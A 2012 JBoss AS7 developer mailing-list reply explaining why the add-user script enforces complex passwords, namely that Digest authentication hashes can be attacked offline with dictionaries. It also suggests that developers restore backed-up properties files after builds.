[jboss-as7-dev] Relaxing password requirements for add-user script?

Darran Lofthouse darran.lofthouse at jboss.com
Wed Oct 10 05:50:33 EDT 2012 

Would also add for those working on this day to day there is nothing to 
stop you backing up your properties files and just copying them back in 
after a build - it is not really necessary to be running through the add 
user process.

Regards,
Darran Lofthouse.


On 10/10/2012 10:47 AM, Darran Lofthouse wrote:
> On 10/10/2012 08:23 AM, Jaikiran Pai wrote:
>> I never have
>> understood this specific requirement of passwords being forced to be of
>> certain type (many sites do it).
>
> The reason for the requirement is to reduce the effectiveness of
> dictionary based attacks by stopping the users from using commonly used
> words for their password.
>
> For Digest authentication which we are using by default the password is
> not transmitted in the clear - however a hash is transmitted and apart
> from the password used to generate the hash the rest of the information
> used to generate the hash is also visible.
>
> At this point if you want to discover the users password you can try
> brute force regenerating the hashes by trying out one candidate password
> after another - passwords could be anything so this is a big task,
> however if most users are just going to pick a normal word or a name or
> something common like that you have a much smaller sample to use to
> discover their password by trying each entry in the smaller sample.
>
> This brute force discovery of a password occurs offline and only
> requires the hashes from the captured packets so we can't detect that it
> is happening so instead a policy is in place to ensure more complex
> passwords are chosen - this way the brute force discovery has a much
> larger sample of passwords.
>
> Ideally SSL/TLS would still be enabled for these connections which would
> prevent even the hashes being seen but compared to BASIC authentication
> where capturing one packet gets you the users password this is a step up
> as an intermediate step.
>
>> I'm not a security expert, but is this "your password has to have upper
>> case, lower case, digit, special char" requirement really worth it in a
>> real application?
>>
>>
>> [1]
>> https://issues.jboss.org/browse/AS7-2756?focusedCommentId=12653165&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-12653165
>>
>> -Jaikiran
>> _______________________________________________
>> jboss-as7-dev mailing list
>> jboss-as7-dev at lists.jboss.org
>> https://lists.jboss.org/mailman/listinfo/jboss-as7-dev
>>
> _______________________________________________
> jboss-as7-dev mailing list
> jboss-as7-dev at lists.jboss.org
> https://lists.jboss.org/mailman/listinfo/jboss-as7-dev
>

More information about the jboss-as7-dev mailing list